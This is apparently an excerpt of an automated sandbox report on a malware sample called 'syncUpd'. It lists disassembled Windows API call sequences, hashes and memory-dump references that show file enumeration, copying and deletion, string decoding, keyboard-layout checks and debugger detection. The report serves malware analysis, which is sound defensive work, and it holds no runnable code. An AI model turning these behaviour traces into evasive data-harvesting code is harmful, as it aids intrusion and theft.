                                                                                                                                                                                                                                                              • Instruction ID: 1beca0db89a34a7d9f561fb59a57ff38f1a0216f2a844ef05cbde65d1a44dc5a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b93bd78b39c71b977efe68c3536e7246d8c1b7eb887c6d70fda356c8a532265
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D75168B5900618ABCB24EBB0DC85EEA737DBB48304F40458DB65A96050EB79ABC5CF94
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00902467
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0090246E
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0090248A
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 009024A1
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D84C), ref: 009024CF
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D850), ref: 009024E5
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00902566
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 0090257B
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00624D04), ref: 009025A0
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00624A28), ref: 009025B3
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 009025C0
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 009025D1
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 671575355-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00901E04
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00901E1B
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D834), ref: 00901E49
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D838), ref: 00901E5F
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00901FA4
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00901FB9
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 180737720-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,0041D746), ref: 0040D58E
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC28), ref: 0040D5DE
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC2C), ref: 0040D5F4
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DB0A
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 0040DB1C
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                                                                                                                                                                                                                              • String ID: [@$\*.*
                                                                                                                                                                                                                                                              • API String ID: 2325840235-1445036518
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,00401E03,?,004215C8,?,?,00000000,?,00000000), ref: 00401813
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,004215CC), ref: 00401863
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,004215D0), ref: 00401879
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401C30
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00401CB4
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00401D0A
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00401D1C
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                                                                                              • API String ID: 1415058207-1173974218
                                                                                                                                                                                                                                                              • Opcode ID: 67436cf5558208d7a974e95cdca42fe5b4e51a3556e1e043cb0b423c581ce31b
                                                                                                                                                                                                                                                              • Instruction ID: 3aa4ae790513c502dab12fd0122e5550b13815c0fff8c800b600eb4522263f51
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67436cf5558208d7a974e95cdca42fe5b4e51a3556e1e043cb0b423c581ce31b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D41225759102189BCB15FB61DC56EEE7739AF54308F41419EB10A62091EF38AFC9CFA8
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041DC10,0041D73F), ref: 0040D22B
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC14), ref: 0040D273
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC18), ref: 0040D289
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040D4EE
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 0040D500
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3334442632-0
                                                                                                                                                                                                                                                              • Opcode ID: 4737da3332eb050fb7f5b83656f90f85ae3f9a175fb1f793fd7e4552fc240b82
                                                                                                                                                                                                                                                              • Instruction ID: a7e743a2a4f5118c59e4eb5b7e6cabc454f6fbff0e67e47d23a58287cf68124a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4737da3332eb050fb7f5b83656f90f85ae3f9a175fb1f793fd7e4552fc240b82
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63913B72A0020497CB14FFB1EC569EE777DAB84308F41466EF90A96581EE38D788CBD5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcpy.KERNEL32(00000000,?), ref: 009071D9
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcat.KERNEL32(00000000), ref: 009071E9
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041DC10,0041D73F), ref: 008FD492
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC14), ref: 008FD4DA
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC18), ref: 008FD4F0
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008FD755
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 008FD767
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3334442632-0
                                                                                                                                                                                                                                                              • Opcode ID: 9b431ad17454946b517c4100d9e0b82599836ab309f1ed7ac4e13ba255db2222
                                                                                                                                                                                                                                                              • Instruction ID: b6188e0c74e8f37c80da9e2eac5389f8b157f762132663e03c58498d7c171414
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b431ad17454946b517c4100d9e0b82599836ab309f1ed7ac4e13ba255db2222
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F912172D042089FCF14FBB4DD56AFEB379ABD4714F004668F60A96185EE34AB488BD1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,?,?,004215C8,?,?,00000000,?,00000000), ref: 008F1A7A
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,004215CC), ref: 008F1ACA
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,004215D0), ref: 008F1AE0
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008F1E97
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 008F1F1B
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008F1F71
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 008F1F83
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcpy.KERNEL32(00000000,?), ref: 009071D9
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcat.KERNEL32(00000000), ref: 009071E9
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1415058207-0
                                                                                                                                                                                                                                                              • Opcode ID: 7951ecb2c0469ab767370ba59687eaf2907cca6d851c199fd70eeed7a365bc93
                                                                                                                                                                                                                                                              • Instruction ID: 517a22e988304cbde84a9c372d8745fff7d13a0d8ac44d9a9ad1941466e95bf8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7951ecb2c0469ab767370ba59687eaf2907cca6d851c199fd70eeed7a365bc93
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC12DB71D08218AECB59EBA0CCA6FEDB378AF94714F504699B106621D1EF706F88CF51
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,0041DC20,0041D746), ref: 008FD7F5
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC28), ref: 008FD845
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DC2C), ref: 008FD85B
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008FDD71
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 008FDD83
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2325840235-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040BFC3
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,0095DA40), ref: 0040BFE1
                                                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040BFEC
                                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 0040C082
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D726), ref: 0040C0B3
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D727), ref: 0040C0C7
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D72A), ref: 0040C0E8
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1498829745-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 008FC22A
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 008FC248
                                                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 008FC253
                                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 008FC2E9
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D726), ref: 008FC31A
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D727), ref: 008FC32E
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041D72A), ref: 008FC34F
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1498829745-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: BinaryCryptString
                                                                                                                                                                                                                                                              • String ID: >N@
                                                                                                                                                                                                                                                              • API String ID: 80407269-3381801619
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                              • GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 00904805
                                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0090481D
                                                                                                                                                                                                                                                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00904831
                                                                                                                                                                                                                                                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00904886
                                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 00904946
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3090951853-0
                                                                                                                                                                                                                                                              • Opcode ID: b2544f40f224b76a8b2ddf093633d274dfd3fb81cf13fe2008bce11d3b2ea03e
                                                                                                                                                                                                                                                              • Instruction ID: f240ca21d45b1f6971952113458190372b9026fb47e376881ab5f1e4041d395d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2544f40f224b76a8b2ddf093633d274dfd3fb81cf13fe2008bce11d3b2ea03e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D4138B4940218AFCB24EB94DC99BEDB375BB94704F2086D9E119A61D1DB742F84CF50
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00418E46
                                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00418E5B
                                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(0041C690), ref: 00418E66
                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00418E82
                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00418E89
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
